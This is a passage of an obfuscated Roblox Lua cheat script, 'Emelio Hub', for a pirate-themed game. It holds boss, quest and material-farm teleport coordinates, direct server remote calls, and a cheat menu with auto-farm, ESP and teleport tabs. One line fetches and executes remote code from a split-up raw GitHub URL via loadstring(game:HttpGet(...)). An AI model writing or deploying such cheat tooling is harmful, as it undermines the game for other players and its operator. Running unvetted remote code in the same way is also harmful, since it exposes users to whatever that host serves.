			PosQBoss = CFrame["new"](-7861.947265625, 5545.517578125, -379.85974121094)
			PosB = CFrame["new"](-7866.1333007813, 5576.4311523438, -546.74816894531)
		elseif _G["FindBoss"] == "Thunder God" then
			bMon = "Thunder God"
			Qname = "SkyExp2Quest"
			Qdata = 3
			PosQBoss = CFrame["new"](-7903.3828125, 5635.9897460938, -1410.923828125)
			PosB = CFrame["new"](-7994.984375, 5761.025390625, -2088.6479492188)
		elseif _G["FindBoss"] == "Cyborg" then
			bMon = "Cyborg"
			Qname = "FountainQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](5258.2788085938, 38.526931762695, 4050.044921875)
			PosB = CFrame["new"](6094.0249023438, 73.770050048828, 3825.7348632813)
		elseif _G["FindBoss"] == "Ice Admiral" then
			bMon = "Ice Admiral"
			Qdata = nil
			PosQBoss = CFrame["new"](1266.08948, 26.1757946, -1399.57678, -0.573599219, 0, -0.81913656, 0, 1, 0, .81913656, 0, -0.573599219)
			PosB = CFrame["new"](1266.08948, 26.1757946, -1399.57678, -0.573599219, 0, -0.81913656, 0, 1, 0, .81913656, 0, -0.573599219)
		elseif _G["FindBoss"] == "Greybeard" then
			bMon = "Greybeard"
			Qdata = nil
			PosQBoss = CFrame["new"](-5081.3452148438, 85.221641540527, 4257.3588867188)
			PosB = CFrame["new"](-5081.3452148438, 85.221641540527, 4257.3588867188)
		end
	end
	if World2 then
		if _G["FindBoss"] == "Diamond" then
			bMon = "Diamond"
			Qname = "Area1Quest"
			Qdata = 3
			PosQBoss = CFrame["new"](-427.5666809082, 73.313781738281, 1835.4208984375)
			PosB = CFrame["new"](-1576.7166748047, 198.59265136719, 13.724286079407)
		elseif _G["FindBoss"] == "Jeremy" then
			bMon = "Jeremy"
			Qname = "Area2Quest"
			Qdata = 3
			PosQBoss = CFrame["new"](636.79943847656, 73.413787841797, 918.00415039063)
			PosB = CFrame["new"](2006.9261474609, 448.95666503906, 853.98284912109)
		elseif _G["FindBoss"] == "Orbitus" then
			bMon = "Orbitus"
			Qname = "MarineQuest3"
			Qdata = 3
			PosQBoss = CFrame["new"](-2441.986328125, 73.359344482422, -3217.5324707031)
			PosB = CFrame["new"](-2172.7399902344, 103.32216644287, -4015.025390625)
		elseif _G["FindBoss"] == "Don Swan" then
			bMon = "Don Swan"
			PosB = CFrame["new"](2286.2004394531, 15.177839279175, 863.8388671875)
		elseif _G["FindBoss"] == "Smoke Admiral" then
			bMon = "Smoke Admiral"
			Qname = "IceSideQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](-5429.0473632813, 15.977565765381, -5297.9614257813)
			PosB = CFrame["new"](-5275.1987304688, 20.757257461548, -5260.6669921875)
		elseif _G["FindBoss"] == "Awakened Ice Admiral" then
			bMon = "Awakened Ice Admiral"
			Qname = "FrostQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](5668.9780273438, 28.519989013672, -6483.3520507813)
			PosB = CFrame["new"](6403.5439453125, 340.29766845703, -6894.5595703125)
		elseif _G["FindBoss"] == "Tide Keeper" then
			bMon = "Tide Keeper"
			Qname = "ForgottenQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](-3053.9814453125, 237.18954467773, -10145.0390625)
			PosB = CFrame["new"](-3795.6423339844, 105.88877105713, -11421.307617188)
		elseif _G["FindBoss"] == "Darkbeard" then
			bMon = "Darkbeard"
			Qdata = nil
			PosQBoss = CFrame["new"](3677.08203125, 62.751937866211, -3144.8332519531)
			PosB = CFrame["new"](3677.08203125, 62.751937866211, -3144.8332519531)
		elseif _G["FindBoss"] == "Cursed Captaim" then
			bMon = "Cursed Captain"
			Qdata = nil
			PosQBoss = CFrame["new"](916.928589, 181.092773, 33422)
			PosB = CFrame["new"](916.928589, 181.092773, 33422)
		elseif _G["FindBoss"] == "Order" then
			bMon = "Order"
			Qdata = nil
			PosQBoss = CFrame["new"](-6217.2021484375, 28.047645568848, -5053.1357421875)
			PosB = CFrame["new"](-6217.2021484375, 28.047645568848, -5053.1357421875)
		end
	end
	if World3 then
		if _G["FindBoss"] == "Stone" then
			bMon = "Stone"
			Qname = "PiratePortQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](-289.76705932617, 43.819011688232, 5579.9384765625)
			PosB = CFrame["new"](-1027.6512451172, 92.404174804688, 6578.8530273438)
		elseif _G["FindBoss"] == "Hydra Leader" then
			bMon = "Hydra Leader"
			Qname = "VenomCrewQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](5211.021484375, 1004.3577885938, 758.18475341797)
			PosB = CFrame["new"](5821.8979492188, 1019.0950927734, -73.719230651855)
		elseif _G["FindBoss"] == "Kilo Admiral" then
			bMon = "Kilo Admiral"
			Qname = "MarineTreeIsland"
			Qdata = 3
			PosQBoss = CFrame["new"](2179.3010253906, 28.731239318848, -6739.9741210938)
			PosB = CFrame["new"](2764.2233886719, 432.46154785156, -7144.4580078125)
		elseif _G["FindBoss"] == "Captain Elephant" then
			bMon = "Captain Elephant"
			Qname = "DeepForestIsland"
			Qdata = 3
			PosQBoss = CFrame["new"](-13232.682617188, 332.40396118164, -7626.01171875)
			PosB = CFrame["new"](-13376.7578125, 433.28689575195, -8071.392578125)
		elseif _G["FindBoss"] == "Beautiful Pirate" then
			bMon = "Beautiful Pirate"
			Qname = "DeepForestIsland2"
			Qdata = 3
			PosQBoss = CFrame["new"](-12682.096679688, 390.88653564453, -9902.1240234375)
			PosB = CFrame["new"](5283.609375, 22.56223487854, -110.78285217285)
		elseif _G["FindBoss"] == "Cake Queen" then
			bMon = "Cake Queen"
			Qname = "IceCreamIslandQuest"
			Qdata = 3
			PosQBoss = CFrame["new"](-819.376709, 64.9259796, -10967.2832, -0.766061664, 0, .642767608, 0, 1, 0, -0.642767608, 0, -0.766061664)
			PosB = CFrame["new"](-678.648804, 381.353943, -11114.2012, -0.908641815, .00149294338, .41757378, .00837114919, .999857843, .0146408929, -0.417492568, .0167988986, -0.90852499)
		elseif _G["FindBoss"] == "Longma" then
			bMon = "Longma"
			Qdata = nil
			PosQBoss = CFrame["new"](-10238.875976563, 389.7912902832, -9549.7939453125)
			PosB = CFrame["new"](-10238.875976563, 389.7912902832, -9549.7939453125)
		elseif _G["FindBoss"] == "Soul Reaper" then
			bMon = "Soul Reaper"
			Qdata = nil
			PosQBoss = CFrame["new"](-9524.7890625, 315.80429077148, 6655.7192382813)
			PosB = CFrame["new"](-9524.7890625, 315.80429077148, 6655.7192382813)
		end
	end
end
			PosM = CFrame["new"](-872.24658203125, 65.81957244873, -10919.95703125)
		elseif L_172_[2] == 2150 or L_172_[2] <= 2199 then
			Mon = "Ice Cream Commander"
			Qdata = 2
			Qname = "IceCreamIslandQuest"
			NameMon = "Ice Cream Commander"
			PosQ = CFrame["new"](-820.64825439453, 65.819526672363, -10965.795898438, 0, 0, -1, 0, 1, 0, 1, 0, 0)
			PosM = CFrame["new"](-558.06103515625, 112.04895782471, -11290.774414062)
		elseif L_172_[2] == 2200 or L_172_[2] <= 2224 then
			Mon = "Cookie Crafter"
			Qdata = 1
			Qname = "CakeQuest1"
			NameMon = "Cookie Crafter"
			PosQ = CFrame["new"](-2021.32007, 37.7982254, -12028.7295, .957576931, -8.80302053e-08, .288177818, 6.9301187e-08, 1, 7.51931211e-08, -0.288177818, -5.2032135e-08, .957576931)
			PosM = CFrame["new"](-2374.13671875, 37.798263549805, -12125.30859375)
		elseif L_172_[2] == 2225 or L_172_[2] <= 2249 then
			Mon = "Cake Guard"
			Qdata = 2
			Qname = "CakeQuest1"
			NameMon = "Cake Guard"
			PosQ = CFrame["new"](-2021.32007, 37.7982254, -12028.7295, .957576931, -8.80302053e-08, .288177818, 6.9301187e-08, 1, 7.51931211e-08, -0.288177818, -5.2032135e-08, .957576931)
			PosM = CFrame["new"](-1598.3070068359, 43.773197174072, -12244.581054688)
		elseif L_172_[2] == 2250 or L_172_[2] <= 2274 then
			Mon = "Baking Staff"
			Qdata = 1
			Qname = "CakeQuest2"
			NameMon = "Baking Staff"
			PosQ = CFrame["new"](-1927.91602, 37.7981339, -12842.5391, -0.96804446, 4.22142143e-08, .250778586, 4.74911062e-08, 1, 1.49904711e-08, -0.250778586, 2.64211941e-08, -0.96804446)
			PosM = CFrame["new"](-1887.8099365234, 77.618507385254, -12998.350585938)
		elseif L_172_[2] == 2275 or L_172_[2] <= 2299 then
			Mon = "Head Baker"
			Qdata = 2
			Qname = "CakeQuest2"
			NameMon = "Head Baker"
			PosQ = CFrame["new"](-1927.91602, 37.7981339, -12842.5391, -0.96804446, 4.22142143e-08, .250778586, 4.74911062e-08, 1, 1.49904711e-08, -0.250778586, 2.64211941e-08, -0.96804446)
			PosM = CFrame["new"](-2216.1882324219, 82.884521484375, -12869.293945312)
		elseif L_172_[2] == 2300 or L_172_[2] <= 2324 then
			Mon = "Cocoa Warrior"
			Qdata = 1
			Qname = "ChocQuest1"
			NameMon = "Cocoa Warrior"
			PosQ = CFrame["new"](233.22836303711, 29.876001358032, -12201.233398438)
			PosM = CFrame["new"](-21.553283691406, 80.574996948242, -12352.387695313)
		elseif L_172_[2] == 2325 or L_172_[2] <= 2349 then
			Mon = L_1_[2]({
				"Chocolate Bar Battle";
				"r"
			})
			Qdata = 2
			Qname = "ChocQuest1"
			NameMon = L_1_[2]({
				"Chocolate Bar Battle",
				"r"
			})
			PosQ = CFrame["new"](233.22836303711, 29.876001358032, -12201.233398438)
			PosM = CFrame["new"](582.59057617188, 77.188095092773, -12463.162109375)
		elseif L_172_[2] == 2350 or L_172_[2] <= 2374 then
			Mon = "Sweet Thief"
			Qdata = 1
			Qname = "ChocQuest2"
			NameMon = "Sweet Thief"
			PosQ = CFrame["new"](150.50663757324, 30.693693161011, -12774.502929688)
			PosM = CFrame["new"](165.1884765625, 76.058853149414, -12600.836914062)
		elseif L_172_[2] == 2375 or L_172_[2] <= 2399 then
			Mon = "Candy Rebel"
			Qdata = 2
			Qname = "ChocQuest2"
			NameMon = "Candy Rebel"
			PosQ = CFrame["new"](150.50663757324, 30.693693161011, -12774.502929688)
			PosM = CFrame["new"](134.86563110352, 77.247680664062, -12876.547851562)
		elseif L_172_[2] == 2400 or L_172_[2] <= 2449 then
			Mon = "Candy Pirate"
			Qdata = 1
			Qname = "CandyQuest1"
			NameMon = "Candy Pirate"
			PosQ = CFrame["new"](-1150.0400390625, 20.378934860229, -14446.334960938)
			PosM = CFrame["new"](-1310.5003662109, 26.016523361206, -14562.404296875)
		elseif L_172_[2] == 2450 or L_172_[2] <= 2474 then
			Mon = "Isle Outlaw"
			Qdata = 1
			Qname = "TikiQuest1"
			NameMon = "Isle Outlaw"
			PosQ = CFrame["new"](-16548.8164, 55.6059914, -172.8125, .213092566, 0, -0.977032006, 0, 1, 0, .977032006, 0, .213092566)
			PosM = CFrame["new"](-16479.900390625, 226.6117401123, -300.31143188477)
		elseif L_172_[2] == 2475 or L_172_[2] <= 2499 then
			Mon = "Island Boy"
			Qdata = 2
			Qname = "TikiQuest1"
			NameMon = "Island Boy"
			PosQ = CFrame["new"](-16548.8164, 55.6059914, -172.8125, .213092566, 0, -0.977032006, 0, 1, 0, .977032006, 0, .213092566)
			PosM = CFrame["new"](-16849.396484375, 192.86505126953, -150.78532409668)
		elseif L_172_[2] == 2500 or L_172_[2] <= 2524 then
			Mon = "Sun-kissed Warrior"
			Qdata = 1
			Qname = "TikiQuest2"
			NameMon = "kissed Warrior"
			PosM = CFrame["new"](-16347, 64, 984)
			PosQ = CFrame["new"](-16538, 55, 1049)
		elseif L_172_[2] == 2525 or L_172_[2] <= 2550 then
			Mon = "Isle Champion"
			Qdata = 2
			Qname = "TikiQuest2"
			NameMon = "Isle Champion"
			PosQ = CFrame["new"](-16541.0215, 57.3082275, 1051.46118, .0410757065, 0, -0.999156058, 0, 1, 0, .999156058, 0, .0410757065)
			PosM = CFrame["new"](-16602.1015625, 130.38734436035, 1087.2456054688)
		elseif L_172_[2] >= 2551 and L_172_[2] <= 2574 then
			Mon = "Serpent Hunter"
			Qdata = 1
			Qname = "TikiQuest3"
			NameMon = "Serpent Hunter"
			PosQ = CFrame["new"](-16679.4785, 176.7473, 1474.3995)
			PosM = CFrame["new"](-16679.4785, 176.7473, 1474.3995)
		elseif L_172_[2] >= 2575 and L_172_[2] <= 2599 then
			Mon = "Skull Slayer"
			Qdata = 2
			Qname = "TikiQuest3"
			NameMon = "Skull Slayer"
			PosQ = CFrame["new"](-16759.5898, 71.2837, 1595.3399)
			PosM = CFrame["new"](-16759.5898, 71.2837, 1595.3399)
		elseif L_172_[2] >= 2600 and L_172_[2] <= 2624 then
			Mon = "Reef Bandit"
			Qdata = 1
			Qname = "SubmergedQuest1"
			NameMon = "Reef Bandit"
			PosQ = CFrame["new"](10882.264, -2086.322, 10034.226)
			PosM = CFrame["new"](10736.6191, -2087.8439, 9338.4882)
		elseif L_172_[2] >= 2625 and L_172_[2] <= 2649 then
			Mon = "Coral Pirate"
			Qdata = 2
			Qname = "SubmergedQuest1"
			NameMon = "Coral Pirate"
			PosQ = CFrame["new"](10882.264, -2086.322, 10034.226)
			PosM = CFrame["new"](10965.1025, -2158.8842, 9177.2597)
		elseif L_172_[2] >= 2650 and L_172_[2] <= 2674 then
			Mon = "Sea Chanter"
			Qdata = 1
			Qname = "SubmergedQuest2"
			NameMon = "Sea Chanter"
			PosQ = CFrame["new"](10882.264, -2086.322, 10034.226)
			PosM = CFrame["new"](10621.0342, -2087.844, 10102.0332)
		elseif L_172_[2] >= 2675 and L_172_[2] <= 2699 then
			Mon = "Ocean Prophet"
			Qdata = 2
			Qname = "SubmergedQuest2"
			NameMon = "Ocean Prophet"
			PosQ = CFrame["new"](10882.264, -2086.322, 10034.226)
			PosM = CFrame["new"](11056.1445, -2001.6717, 10117.4493)
		elseif L_172_[2] >= 2700 and L_172_[2] <= 2724 then
			Mon = "High Disciple"
			Qdata = 1
			Qname = "SubmergedQuest3"
			NameMon = "High Disciple"
			PosQ = CFrame["new"](9636.52441, -1992.19507, 9609.52832)
			PosM = CFrame["new"](9828.087890625, -1940.9089355469, 9693.0634765625)
		elseif L_172_[2] >= 2725 and L_172_[2] <= 2800 then
			Mon = "Grand Devotee"
			Qdata = 2
			Qname = "SubmergedQuest3"
			NameMon = "Grand Devotee"
			PosQ = CFrame["new"](9636.52441, -1992.19507, 9609.52832)
			PosM = CFrame["new"](9557.5849609375, -1928.0404052734, 9859.1826171875)
		end
	end
end
MaterialMon = function()
	local L_173_ = {}
	L_173_[2] = game["Players"]["LocalPlayer"]
	L_173_[1] = L_173_[2]["Character"] and L_173_[2]["Character"]:FindFirstChild("HumanoidRootPart")
	if not L_173_[1] then
		return
	end
	shouldRequestEntrance = function(L_174_arg0, L_175_arg1)
		local L_176_ = {}
		L_176_[4], L_176_[1] = L_174_arg0, L_175_arg1
		L_176_[2] = (L_173_[1]["Position"] - L_176_[4])["Magnitude"]
		if L_176_[2] >= L_176_[1] then
			replicated["Remotes"]["CommF_"]:InvokeServer("requestEntrance", L_176_[4])
		end
	end
	if World1 then
		if SelectMaterial == "Angel Wings" then
			local L_177_ = {}
			MMon = {
				"Shanda",
				"Royal Squad",
				"Royal Soldier";
				"Wysper",
				"Thunder God"
			}
			MPos = CFrame["new"](-4698, 845, -1912)
			SP = "Default"
			L_177_[1] = Vector3["new"](-4607.82275, 872.54248, -1667.55688)
			shouldRequestEntrance(L_177_[1], 10000)
		elseif SelectMaterial == L_1_[2]({
			"Leather + Scrap Meta";
			"l"
		}) then
			MMon = {
				"Brute",
				"Pirate"
			}
			MPos = CFrame["new"](-1145, 15, 4350)
			SP = "Default"
		elseif SelectMaterial == "Magma Ore" then
			MMon = {
				"Military Soldier";
				"Military Spy";
				"Magma Admiral"
			}
			MPos = CFrame["new"](-5815, 84, 8820)
			SP = "Default"
		elseif SelectMaterial == "Fish Tail" then
			local L_178_ = {}
			MMon = {
				"Fishman Warrior",
				"Fishman Commando";
				"Fishman Lord"
			}
			MPos = CFrame["new"](61123, 19, 1569)
			SP = "Default"
			L_178_[1] = Vector3["new"](61163.8515625, 5.342342376709, 1819.7841796875)
			shouldRequestEntrance(L_178_[1], 17000)
		end
	elseif World2 then
		if SelectMaterial == L_1_[2]({
			"Leather + Scrap Meta";
			"l"
		}) then
			MMon = {
				"Marine Captain"
			}
			MPos = CFrame["new"](-2010.5059814453, 73.001159667969, -3326.6208496094)
			SP = "Default"
		elseif SelectMaterial == "Magma Ore" then
			MMon = {
				"Magma Ninja",
				"Lava Pirate"
			}
			MPos = CFrame["new"](-5428, 78, -5959)
			SP = "Default"
		elseif SelectMaterial == "Ectoplasm" then
			local L_179_ = {}
			MMon = {
				"Ship Deckhand",
				"Ship Engineer",
				"Ship Steward",
				"Ship Officer"
			}
			MPos = CFrame["new"](911.35827636719, 125.95812988281, 33159.5390625)
			SP = "Default"
			L_179_[1] = Vector3["new"](61163.8515625, 5.342342376709, 1819.7841796875)
			shouldRequestEntrance(L_179_[1], 18000)
		elseif SelectMaterial == "Mystic Droplet" then
			MMon = {
				"Water Fighter"
			}
			MPos = CFrame["new"](-3385, 239, -10542)
			SP = "Default"
		elseif SelectMaterial == "Radioactive Material" then
			MMon = {
				"Factory Staff"
			}
			MPos = CFrame["new"](295, 73, -56)
			SP = "Default"
		elseif SelectMaterial == "Vampire Fang" then
			MMon = {
				"Vampire"
			}
			MPos = CFrame["new"](-6033, 7, -1317)
			SP = "Default"
		end
	elseif World3 then
		if SelectMaterial == "Scrap Metal" then
			MMon = {
				"Jungle Pirate",
				"Forest Pirate"
			}
			MPos = CFrame["new"](-11975.78515625, 331.77340698242, -10620.030273438)
			SP = "Default"
		elseif SelectMaterial == "Fish Tail" then
			MMon = {
				"Fishman Raider",
				"Fishman Captain"
			}
			MPos = CFrame["new"](-10993, 332, -8940)
			SP = "Default"
		elseif SelectMaterial == "Conjured Cocoa" then
			MMon = {
				L_1_[2]({
					"Chocolate Bar Battle",
					"r"
				}),
				"Cocoa Warrior"
			}
			MPos = CFrame["new"](620.63446044922, 78.936447143555, -12581.369140625)
			SP = "Default"
		elseif SelectMaterial == "Dragon Scale" then
			MMon = {
				"Dragon Crew Archer";
				"Dragon Crew Warrior"
			}
			MPos = CFrame["new"](6594, 383, 139)
			SP = "Default"
		elseif SelectMaterial == "Gunpowder" then
			MMon = {
				"Pistol Billionaire"
			}
			MPos = CFrame["new"](-84.855690002441, 85.620613098145, 6132.0087890625)
			SP = "Default"
		elseif SelectMaterial == "Mini Tusk" then
			MMon = {
				"Mythological Pirate"
			}
			MPos = CFrame["new"](-13545, 470, -6917)
			SP = "Default"
		elseif SelectMaterial == "Demonic Wisp" then
			MMon = {
				"Demonic Soul"
			}
			MPos = CFrame["new"](-9495.6806640625, 453.58624267578, 5977.3486328125)
			SP = "Default"
		end
	end
end
QuestNeta = function()
	local L_180_ = {}
	L_180_[2] = QuestCheck()
	return {
		[1] = Mon,
		[2] = Qdata;
		[3] = Qname,
		[4] = PosM;
		[5] = NameMon,
		[6] = PosQ
	}
end
L_1_[16] = (loadstring(game:HttpGet(L_1_[2]({
	"https://raw.githubus",
	"ercontent.com/TBoyRo";
	"blox727/Ui/refs/head";
	"s/main/UiRedzHub.lua"
}))))()
L_1_[38] = L_1_[16]:MakeWindow({
	["Title"] = "Emelio Hub";
	["SubTitle"] = "by Emelio",
	["SaveFolder"] = "redz library V5.json"
})
L_1_[87] = Instance["new"]("ScreenGui")
L_1_[87]["Name"] = "ControlGUI"
L_1_[87]["Parent"] = game["CoreGui"]
L_1_[41] = Instance["new"]("ImageButton")
L_1_[41]["Size"] = UDim2["new"](0, 50, 0, 50)
L_1_[41]["Position"] = UDim2["new"](.15, 0, .15, 0)
L_1_[41]["Image"] = L_1_[2]({
	"rbxassetid://7367578",
	"7844710"
})
L_1_[41][L_1_[2]({
	"BackgroundTransparen";
	"cy"
})] = 1
L_1_[41]["Parent"] = L_1_[87]
L_1_[82] = Instance["new"]("UICorner")
L_1_[82]["CornerRadius"] = UDim["new"](.5, 0)
L_1_[82]["Parent"] = L_1_[41]
L_1_[25] = Instance["new"]("UIStroke", L_1_[41])
L_1_[25]["Thickness"] = 2
L_1_[25]["ApplyStrokeMode"] = Enum["ApplyStrokeMode"]["Border"]
L_1_[76] = {
	Color3["fromRGB"](255, 0, 0),
	Color3["fromRGB"](255, 127, 0),
	Color3["fromRGB"](255, 255, 0);
	Color3["fromRGB"](0, 255, 0);
	Color3["fromRGB"](0, 255, 255);
	Color3["fromRGB"](0, 0, 255),
	Color3["fromRGB"](139, 0, 255)
}
task["spawn"](function()
	local L_181_ = {}
	L_181_[1] = 1
	while true do
		L_1_[25]["Color"] = L_1_[76][L_181_[1]]
		L_181_[1] = L_181_[1] % #L_1_[76] + 1
		task["wait"](.3)
	end
end)
L_1_[78] = false
L_1_[73] = function(L_182_arg0)
	local L_183_ = {}
	L_183_[3] = L_182_arg0
	L_183_[2] = L_183_[3]["Position"] - L_1_[33]
	L_1_[41]["Position"] = UDim2["new"](L_1_[92]["X"]["Scale"], L_1_[92]["X"]["Offset"] + L_183_[2]["X"], L_1_[92]["Y"]["Scale"], L_1_[92]["Y"]["Offset"] + L_183_[2]["Y"])
end
L_1_[41]["InputBegan"]:Connect(function(L_184_arg0)
	local L_185_ = {}
	L_185_[2] = L_184_arg0
	if L_185_[2]["UserInputType"] == Enum["UserInputType"]["MouseButton1"] or L_185_[2]["UserInputType"] == Enum["UserInputType"]["Touch"] then
		L_1_[78] = true
		L_1_[33] = L_185_[2]["Position"]
		L_1_[92] = L_1_[41]["Position"]
		L_185_[2]["Changed"]:Connect(function()
			if L_185_[2]["UserInputState"] == Enum["UserInputState"]["End"] then
				L_1_[78] = false
			end
		end)
	end
end)
L_1_[41]["InputChanged"]:Connect(function(L_186_arg0)
	local L_187_ = {}
	L_187_[1] = L_186_arg0
	if L_187_[1]["UserInputType"] == Enum["UserInputType"]["MouseMovement"] or L_187_[1]["UserInputType"] == Enum["UserInputType"]["Touch"] then
		L_1_[104] = L_187_[1]
	end
end);
(game:GetService("UserInputService"))["InputChanged"]:Connect(function(L_188_arg0)
	local L_189_ = {}
	L_189_[1] = L_188_arg0
	if L_1_[78] and L_189_[1] == L_1_[104] then
		L_1_[73](L_189_[1])
	end
end)
L_1_[108] = true
L_1_[41]["MouseButton1Click"]:Connect(function()
	L_1_[108] = not L_1_[108]
	L_1_[38]:Minimize(not L_1_[108])
end)
L_1_[93] = {
	["Info"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Home";
		["Icon"] = "Info"
	});
	["Main"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Farming";
		["Icon"] = L_1_[2]({
			"rbxassetid://7733960";
			"981"
		})
	}),
	["Settings"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Setting",
		["Icon"] = L_1_[2]({
			"rbxassetid://7734053";
			"495"
		})
	});
	["Fish"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Fishing";
		["Icon"] = L_1_[2]({
			"rbxassetid://1276640";
			"59821666"
		})
	}),
	["Quests"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Quest And Item";
		["Icon"] = L_1_[2]({
			"rbxassetid://1307562",
			"2619"
		})
	}),
	["SeaEvent"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Sea Event";
		["Icon"] = "waves"
	});
	["Race"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Mirage And Race",
		["Icon"] = L_1_[2]({
			"rbxassetid://1116288",
			"9532"
		})
	}),
	["Prehistoric"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Volcano Event";
		["Icon"] = "tent"
	}),
	["Esp"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Stats And Esp";
		["Icon"] = L_1_[2]({
			"rbxassetid://7040410";
			"130"
		})
	});
	["Raids"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Fruit And Raid";
		["Icon"] = L_1_[2]({
			"rbxassetid://1115598";
			"6081"
		})
	}),
	["Combat"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Local Player",
		["Icon"] = L_1_[2]({
			"rbxassetid://1307565",
			"1575"
		})
	}),
	["Travel"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Teleport";
		["Icon"] = "locate"
	});
	["Shop"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Shopping";
		["Icon"] = L_1_[2]({
			"rbxassetid://6031265",
			"976"
		})
	}),
	["Misc"] = L_1_[38]:MakeTab({
		["Title"] = "Tab Miscellaneous",
		["Icon"] = L_1_[2]({
			"rbxassetid://1070978",
			"3577"
		})
	})
}
L_1_[93]["Info"]:AddSection("Information")
L_1_[93]["Info"]:AddDiscordInvite({
	["Name"] = "Emelio Hub",
	["Description"] = L_1_[2]({
		"Release Date [01/05/";
		"2026]"
	}),
	["Logo"] = L_1_[2]({
		"rbxassetid://7367578",
		"7844710"
	}),
	["Invite"] = L_1_[2]({
		"",
		""
	})
})
L_1_[93]["Info"]:AddSection("Status Server")
Time = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Time Zone";
	["Content"] = ""
})
function UpdateOS()
	local L_190_ = {}
	L_190_[6] = os["date"]("*t")
	L_190_[4] = L_190_[6]["hour"] % 24
	L_190_[3] = L_190_[4] < 12 and "AM" or "PM"
	L_190_[8] = string["format"]("%02i:%02i:%02i %s", (L_190_[4] - 1) % 12 + 1, L_190_[6]["min"], L_190_[6]["sec"], L_190_[3])
	L_190_[11] = string["format"]("%02d/%02d/%04d", L_190_[6]["day"], L_190_[6]["month"], L_190_[6]["year"])
	L_190_[9] = game:GetService("LocalizationService")
	L_190_[1] = game:GetService("Players")
	L_190_[10] = L_190_[1]["LocalPlayer"]
	L_190_[12] = L_190_[10]["Name"]
	if not(getgenv())["countryRegionCode"] then
		L_190_[7], L_190_[2] = pcall(function()
			return L_190_[9]:GetCountryRegionForPlayerAsync(L_190_[10])
		end)
		if L_190_[7] then
			(getgenv())["countryRegionCode"] = L_190_[2]
		else
			(getgenv())["countryRegionCode"] = "Unknown"
		end
	else
		L_190_[2] = (getgenv())["countryRegionCode"]
	end
	Time:SetDesc(L_190_[11] .. (" - " .. (L_190_[8] .. (" [ " .. (L_190_[2] .. " ]")))))
end
spawn(function()
	while true do
		UpdateOS()
		wait(1)
	end
end)
Timmessss = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Time",
	["Content"] = ""
})
function UpdateTime()
	local L_191_ = {}
	L_191_[1] = math["floor"](workspace["DistributedGameTime"] + .5)
	L_191_[3] = math["floor"](L_191_[1] / 3600) % 24
	L_191_[2] = math["floor"](L_191_[1] / 60) % 60
	L_191_[4] = math["floor"](L_191_[1] / 1) % 60
	Timmessss:SetDesc(L_191_[3] .. (" Hour (h) " .. (L_191_[2] .. (" Minute (m) " .. (L_191_[4] .. " Second (s) ")))))
end
spawn(function()
	while true do
		UpdateTime()
		wait(1)
	end
end)
Miragecheck = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Mirage Island";
	["Content"] = "Status: "
})
L_1_[77] = ""
spawn(function()
	pcall(function()
		while true do
			local L_192_ = {}
			wait(1)
			L_192_[3] = game["Workspace"]["_WorldOrigin"]["Locations"]:FindFirstChild("Mirage Island") ~= nil
			L_192_[1] = L_192_[3] and "âœ…ï¸" or "âŒï¸"
			if L_192_[1] ~= L_1_[77] then
				Miragecheck:SetDesc("Status: " .. L_192_[1])
				L_1_[77] = L_192_[1]
			end
		end
	end)
end)
Kitsunecheck = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Kitsune Island",
	["Content"] = "Status: "
})
spawn(function()
	local L_193_ = {}
	L_193_[1] = ""
	while task["wait"](1) do
		local L_194_ = {}
		L_194_[2] = (game:GetService("Workspace"))["Map"]:FindFirstChild("KitsuneIsland") and "âœ…ï¸" or "âŒï¸"
		if L_194_[2] ~= L_193_[1] then
			Kitsunecheck:SetDesc("Status: " .. L_194_[2])
			L_193_[1] = L_194_[2]
		end
	end
end)
CPrehistoriccheck = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Prehistoric Island",
	["Desc"] = "Status: "
})
task["spawn"](function()
	local L_195_ = {}
	L_195_[2] = ""
	while task["wait"](1) do
		local L_196_ = {}
		L_196_[1] = game["Workspace"]["_WorldOrigin"]["Locations"]:FindFirstChild("Prehistoric Island") and "âœ…ï¸" or "âŒï¸"
		if L_196_[1] ~= L_195_[2] then
			CPrehistoriccheck:SetDesc("Status: " .. L_196_[1])
			L_195_[2] = L_196_[1]
		end
	end
end)
FrozenIsland = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Frozen Dimension";
	["Content"] = "Status: "
})
spawn(function()
	local L_197_ = {}
	L_197_[2] = ""
	while wait(1) do
		local L_198_ = {}
		L_198_[2] = game["Workspace"]["_WorldOrigin"]["Locations"]:FindFirstChild("Frozen Dimension") and "âœ…ï¸" or "âŒï¸"
		if L_198_[2] ~= L_197_[2] then
			FrozenIsland:SetDesc("Status: " .. L_198_[2])
			L_197_[2] = L_198_[2]
		end
	end
end)
MobCakePrince = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Dimension Killed",
	["Content"] = ""
})
spawn(function()
	while wait(1) do
		local L_199_ = {}
		L_199_[2] = (game:GetService("ReplicatedStorage"))["Remotes"]["CommF_"]:InvokeServer("CakePrinceSpawner")
		L_199_[3] = "Cake Prince: âœ…ï¸"
		if string["len"](L_199_[2]) >= 86 then
			local L_200_ = {}
			L_200_[1] = string["sub"](L_199_[2], 39, 41)
			L_199_[3] = "Kill: " .. L_200_[1]
		end
		MobCakePrince:SetDesc(L_199_[3])
	end
end)
CheckRip = L_1_[93]["Info"]:AddParagraph({
	["Title"] = "Rip_Indra";
	["Content"] = "Status: "
})
spawn(function()
	local L_201_ = {}
	L_201_[2] = ""
